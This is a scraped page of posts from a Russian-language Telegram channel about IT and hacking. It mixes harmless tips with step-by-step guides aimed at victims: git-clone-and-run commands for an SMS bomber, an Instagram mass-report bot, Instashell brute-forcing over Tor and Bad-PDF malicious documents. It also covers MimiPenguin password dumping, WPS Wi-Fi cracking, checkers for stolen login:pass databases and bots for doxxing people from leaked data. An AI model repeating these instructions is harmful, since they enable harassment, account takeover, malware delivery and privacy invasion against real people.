CMD | IT
25.6K subscribers
2.4K photos
596 videos
10 files
3.87K links
Новости IT, Безопасность в сети, Социальная инженерия.

Ссылка: @Portal_v_IT

Сотрудничество: @oleginc, @tatiana_inc

Купить рекламу: telega.in/c/cmd_it

РКН: clck.ru/3Jb78b
Download Telegram
Как отключить всю рекламу на смартфоне

Нынешний интернет-серфинг сложно представить без назойливой рекламы, ведь ее присутствие встречается буквально всюду. И что самое неприятное, помимо причинения эстетического дискомфорта, она безжалостно истощает ресурсы системы и драгоценного интернет трафика.

Положительная новость заключается в том, что блокировать большую часть рекламы можно и без установки дополнительных приложений. Для этого нужно перейти в настройки устройства, найти пункт «Частный DNS» и вписать туда dns.AdGuard.com.

После чего включится фильтрация трафика, которая будет блокировать нежелательный контент и вспомогательно защищать личные данные. Стоит отметить, что данный способ работает только на Android-устройствах, чья версия операционной системы не ниже 9-й. Инструкции для других устройств можно найти здесь.

#полезно
1👍1
​​Устраиваем мощнейшую СМС-Атаку

В данном посте будет рассмотрен способ организации мощной SMS-атаки на любой номер телефона. Подобную атаку можно спокойно использовать чтобы насолить своему неприятелю и вывести его из себя.

Приступим:

1. Обновляем нужные пакеты:
- apt update & apt upgrade -y

2. Устанавливаем пакет "Git"
- pkg install git

3. Устанавливаем репозиторий Github:
- git clone https://github.com/Argisht44/android.git

4. Далее просто прописывайте команды по очереди:
- cd android
- cd Infinite-Bomber-arm64
- chmod 777 infinite-bomber

5. Запустите утилиту:
- ./infinite-bomber

Сразу после запуска, вам предложит ввести и номер, как только вы введёте, атака начнётся.
​​Боты для пробива в Telegram

В данном посте пойдёт речь про ботов в Telegram, позволяющих провести пробив и узнать практически всю нужную информацию про вашу жертву.

Боты не гарантируют вам полной информации, но в OSINT может пригодится каждый байт данных.

1. @bmi_np_bot - позволяет определить страну, регион и оператора имея всего-лишь номер телефона.

2. @getfb_bot - выдаёт по номеру телефона страницу в Facebook.

3. @get_kontakt_bot - показывает, как номер указан в контактах.

4. @GetPhone_bot - пробивает номер телефона по открытым базам данных.

5. @imole_bot - пробивает по слитымы базам данных номер телефона.
1
​​Сервисы для пробива по фото

В данном посте пойдёт речь про специализированные сервисы для пробива по фото. Подборка достаточно большая, в ней собраны практически всевозможные сайты для проведения и упрощения OSINT разведки.

Фото:
1. azure.microsoft.com — соотнесение лиц, определит вероятность того, что на двух разных изображениях изображен один и тот же человек, и выдаст оценку достоверности

2. findclone.ru — поиск по базе из VK

3. pimeyes.com — индексирует фото с сайтов, не точен, ограниченные возможности

4. search4faces.com — поиск по базам лиц VK и OK

5. metapicz.com — покажет EXIF
stolencamerafinder.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством

6. exif.regex.info — извлекает META-данные

7. cameratrace.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством

8. get-metadata.com — извлекает META-данные

9. 29a.ch — фото-форензика, анализ изображения на изменения

10. stylesuxx.github.io — декодирует скрытое сообщение в изображении

Для файла формата PDF:

1. exif.regex.info — извлекает META-данные
2. www.get-metadata.com — извлекает META-данные
👍2
​​Компьютерная разведка

В данном посте поговорим о сервисах и ути­литах, которые созданы для ана­лиза таких дан­ных, как IP, SSID, метадан­ные фай­лов, DNS-записи, и все­го, где объ­ектом ана­лиза выс­тупа­ет эле­мент IT-струк­туры, будь то сайт или IP-адрес.

1. Urlscan.io — про­веря­ет, кому выдан TLS-сер­тификат и какие IP-адре­са свя­заны с сай­том.

2. PDFCandy — сервис дает тебе воз­можность извле­кать и изме­нять метадан­ные PDF.

3. PublicWWW — сервис ищет инфу по исходно­му коду стра­ниц. Находит ник­ней­мы, упо­мина­ния в коде, сопос­тавля­ет знач­ки сай­тов, что поз­воля­ет искать двой­ники.

4. Metadata2Go — поможет узнать все метадан­ные фай­ла.

5. Knock Subdomain Scan— переби­рает суб­домены на целевом домене и может генери­ровать выход­ной файл сhttps://github.com/guelfoweb/knock резуль­татами.
​​Воскресная подборка: программы которые прокачают ваш ПК

В данной воскресной подборке пойдёт речь про специализированные программы способные "прокачать" ваш ПК, а именно добавить какие-то новые функции, ускорить работу и так далее.

Unchecky - автоматически снимает галочки напротив разрешений на установку дополнительных и скрытых сервисов при установке программ.

TeraCopy - заменяет стандартное окно копирования файлов, предоставляя куда больше информации об этом процессе добавляя к нему дополнительный функционал.

Moo0 System Monitor - маленький и легкий виджет для рабочего стола, который показывает абсолютно всю информацию о происходящих процессах и состоянии компьютера в режиме реального времени.

Fences - позволяет быстро и удобно сортировать и группировать файлы, папки и ярлыки рабочего стола в аккуратные таблички, которые можно гибко настраивать.

Light Bulb - автоматически меняет яркость и оттенок экрана в зависимости от времени суток.
Вам нравится наша новая рубрика "Воскресная подборка"?
Anonymous Poll
89%
Топ бро! 💪🏻
11%
Нет, не очень! ✖️
Современный учебник JavaScript

learn.javascript.ru — учебник по JavaScript, начиная с основ, включающий в себя много тонкостей и фишек JavaScript/DOM. Вы можете изучить JavaScript, начиная с нуля и заканчивая продвинутыми концепциями вроде ООП.
​​Декодируем любые шифры с помощью hURL

hURL — Небольшая утилита, которая может кодировать и декодировать между огромным количеством различных шифров.

Установка:
$ git clone https://github.com/fnord0/hURL
$ cd hURL

Использование:
$ ./hURL -b "S2FsaSBMaW51eAo="

Вывод:
Original string :: S2FsaSBMaW51eAo=
base64 DEcoded string :: Kali Linux


Вся информация предоставлена исключительно с целью ознакомления. Мы не несём ответственности за ваши действия.
👍1
​​Проверка граждан РФ

В данном посте представленна подборка из очень полезных сайтов, которые подскажут вам очень много интересной информации про интересующего вас человека.

1.Международный розыск: https://www.interpol.int/notice/search/wanted

2. Список террористов: http://fedsfm.ru/documents/terrorists-catalog-portal-act

3. Федеральный розыск:
https://mvd.ru/wanted

4. Розыск сбежавших заключенных:
http://fsin.su/criminal/

5. Розыск ФССП:
http://fssprus.ru/iss/ip_search\

6. Действительность паспорта:
http://сервисы.гувм.мвд.рф/info-service.htm?sid=2000

7. Проверка ИНН:
https://service.nalog.ru/inn.do

8. Кредиты:
https://app.exbico.ru/

9. Исполнительные производства:
http://fssprus.ru/iss/ip

10. Налоговые задолженности:
https://peney.net/

11. Залоги имущества:
https://www.reestr-zalogov.ru/state/index#

12. Банкротство:
https://bankrot.fedresurs.ru/

13. Участие в судопроизводстве: https://bsr.sudrf.ru/bigs/portal.html

14. Решения мировых судей СПб:
https://mirsud.spb.ru/

15. Участие в бизнесе:
https://zachestnyibiznes.ru/
https://ogrn.site/
​​Баним чужие аккаунты в Instagram

Данный инструмент позволит вам автоматически отправлять множество жалоб на чужие аккаунты в различных социальных сетях с целью их блокировки.

Установка:

▫️ git clone https://github.com/mrwn007/007spam-BOT.git

▫️ cd 007spam-BOT

▫️ python3 -m pip install requests

Использование:

▫️ python3 bot.py

Данный бот активно спамит жалобами, что позволяет убрать любой контент жертвы, а в конечном итоге, и ее аккаунт.
👍1
​​Как взломать аккаунт в Instagram?📙

Разработчики любых сервисов, сайтов и приложений имеют свойство ошибаться, и Instagram не является исключением. Ошибка, которую допустили при обновлении социальной сети, привела к разгулу хакеров и краже аккаунтов. Теперь проводить BruteForce атаки можно совершенно легко и эффективно.

Чтобы осуществить данную атаку, не нужно быть Кевином Митником - достаточно установить утилиту Instashell и следовать инструкции ниже.

Установка:
◽️git clone https://github.com/tiptoettt/instashell
◽️cd instashell
◽️chmod +x instashell.sh

Использование:
◽️service tor start
◽️./instashell.sh

После запуска программы, вам предложит ввести имя профиля жертвы в Instagram и путь к словарю паролей. Если пароль будет подобран, то утилита выдаст вам нужный.

⛔️Информация предоставлена с целью ознакомления.
👍2
Как вернуть ваш ПК к жизни, если он завис?

Если вы переоцениваете возможности вашего железа и вам свойственно нагружать его по полной программе, то зависания являются для вас не такой уж и редкой проблемой. С данной проблемой можно справиться с помощью специальных сочетаний клавиш.

1. «Esc» - Данная клавиша ответственна за отмену последнего действия и выхода из открытого приложения.

2. «Alt+F4» - Данная комбинация применяется для восстановления работы операционной системы, которая зависла по неустановленной причине.

3. «Ctrl+Alt+Del» - Эта комбинация применяется для перезагрузки компьютера с первых версий Windows.

Подобные сочетания очень полезная фича, но лучше изначально не допускать ситуаций с зависаниями и произвести профилактику.
​​​​Подборка сервисов временной почты📥

Как часто вам приходится вводить свою почту для регистрации? Около 90% людей при регистрации где-либо пишут свою настоящую почту, чем и "убивают" свою анонимность. В этой подборке мы и будем обходить такие случаи, с помощью бесплатных сервисов.

1. crazymailing.com - сервис временной почты для борьбы со спамом.

2. temp-mail.org - временная одноразовая почта.

3. dropmail.me - бесплатный анонимный временный адрес электронной почты.

4. my10minutemail.com - сервис временной анонимной электронной почты (tempmail).

5. 10minemail.com - временная почта на 10 минут.

6. mohmal.com - бесплатный анонимный временный адрес электронной почты.

7. emailondeck.com - сервис временной почты для борьбы со спамом.

8. 10minutemail.net - временная почта на десять минут.

9. tempail.com - бесплатный анонимный временный адрес электронной почты.
​​Как заразить документ Office Word (PDF)🧾

Вирусы, спрятанные в документы и PDF файлы очень опасны, ведь их обнаружение задача не из простых. В этом посте будет показан пример заражения PDF файла с помощью утилиты Bad-PDF.

Установка:

▫️git clone https://github.com/deepzec/Bad-Pdf.git
▫️cd Bad-pdf/
▫️chmod +x badpdf.py

Использование:

▫️python badpdf.py

В папке с утилитой будет вредоносный файл, созданный Bad-PDF.

Далее просто отправьте сгенерированный вирус жертве. Метод сработает только для версий PDF "Adobe Acrobat".
👍1
​​Фейковые Root права в Termux

Приветствую! Существует огромное количество утилит в Termux, некоторые из них являются поистине мощными и для их использования необходимы root права. Но что делать, если их получение является крайне сложным процессом, а использовать утилиты хочется? Специально для такого случая была создана утилита FakeRoot.

Установка:
▫️git clone https://github.com/B41B4L/FakeRoot
▫️cd FakeRoot
▫️chmod +x Root.sh

Использование:
▫️./Root.sh

Готово, для проверки мы можем написать, команду:
▫️whoami
Результат должен быть такой - root

Так-же есть альтернативный способ установки:
▫️pkg install fakeroot

И чтобы активировать режим Рут мы всегда прописываем команду:
▫️fakeroot

Готово!
​​Взламываем пароль Linux

Взлом пароля Администратора Linux можно сделать с помощью создания дампа во время загрузки GRUB, но не всегда к нему есть так необходимый доступ.

Тогда как совершить это злодеяние? Для этого существуют специальные утилиты, одна из них - это MimiPenguin.

"Takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word's probability by checking hashes in /etc/shadow, hashes in memory, and regex searches. 2.0 introduces a clean C port that aims to increase the speed of execution and portability"

Установка:

Устанавливаем репозиторий GitHub:

▫️git clone https://github.com/huntergregal/mimipenguin

Использование:

Запускаем утилиту:

▫️./mimipemguin

Перед вами появится список из пользователей и паролей к каждому из них.
Взлом WIFI

В данном посте будет рассмотрена утилита "WIFI WPS WPA TESTER". Она способна взломать публичные точки доступа, основываясь на уязвимостях WPS/WPA. К сожалению, использовать программу в полной мере возможно только при наличии Root (Прав суперпользоввателя).

1. Скачайте приложение - Google Play.

2. Зайдите и нажмите на "Scan".

3. Выберите самую уязвимую сеть и кликните на неё.

4. Далее выберите нужный метод атаки, в основном это Перебор всех "PIN-ов"

В случае успеха, вы получите полный доступ к взломанной WiFi сети.
​​Боты для пробива в Telegram Часть 2

В прошлом посте мы уже говорили про сервисы для пробива людей через специальные боты в Telegam, увидели, что вам понравилось и сделали вторую часть. Проявите актив и в скором времени сделаем третью часть.

1. @AVINF0BOT - данный бот позволит пробить человека по автомобилю, а именно: номерной знак, VIN или номер телефона владельца машины и получить в ответ довольно содержательную информацию.

2. @smart_searchbotbot - самый обычный пробив по номеру телефона.пробив по номеру телефона. Дает ФИО, профили Вконтакте, почты или ИНН, если номер телефона юридического лица.

3. @WhoisDomBot - информация о домене.

4. @mnp_bot - определяет страну, регион и оператора телефонного номера.

5. @Search_firm_bot - поиск по организации, банкам, почтовому индексу и паспорту.

6. @GetPhone_bot - поиск номера телефона по базам базах
👍3👎1
​​Подборка онлайн-чекеров

Данный пост будет спасением для тех, кто достал какую-нибудь Базу Данных, и вам нужно провести сканирование, но качественного софта под рукой нет. На этот случай есть специальные сервисы:

1. old.vkch.ru - чекер аккаунтов Вконтакте (number:pass, mail:pass)

2. checkz.net/tools/mail-access-checker - чекер почт на валидность

3. checkz.net/tools/steam-account-checker - чекер Steam (login:pass)

4. checkz.net/tools/netflix-account-checker - чекер Netflix (mail:pass)

5. checkz.net/tools/reddit-account-checker - чекер Reddit (login:pass)

6. checkz.net/tools/lol-account-checker - чекер League of Legends (login:pass)

7. checkz.net/tools/valorant-account-checker - чекер Valorant (login:pass)

8. checkz.net/tools/nordvpn-account-checker - чекер NordVPN (mail:pass).

9. checkz.net/tools/spotify-account-checker - чекер Spotify (mail:pass)

10. checkz.net/tools/mobile-legends-account-checker - чекер Mobile Legends (mail:pass)
Подборка сайтов для отправки анонимных СМС

При работе в интернете светить своим личным номером телефона не стоит, я думаю вы и сами это понимаете. Приведу в пример СМС-Бобмер, это когда к вам приходят просто сотни уведомлений и телефон будто взрывается. Массовые рассылки, проверка статуса номера, всё это можно сделать с помощью данных сервисов.

1. https://freebulksmsonline.com/

2. https://www.afreesms.com/

3. https://smsend.ru/

4. https://txtemnow.com/

5. http://www.sendanonymoussms.com/

6. http://www.textem.net/

7. http://www.txtdrop.com/

Некоторые сервисы оставляют в конце сообщения что-то вроде водного знака - ссылка или название сайта. Также сообщения доходят не сразу, но всё работает исправно.

Помимо перечисленного, СМС могут приходить на номера определённых регионов, обычно эта информация указывается на сайте.
🔥1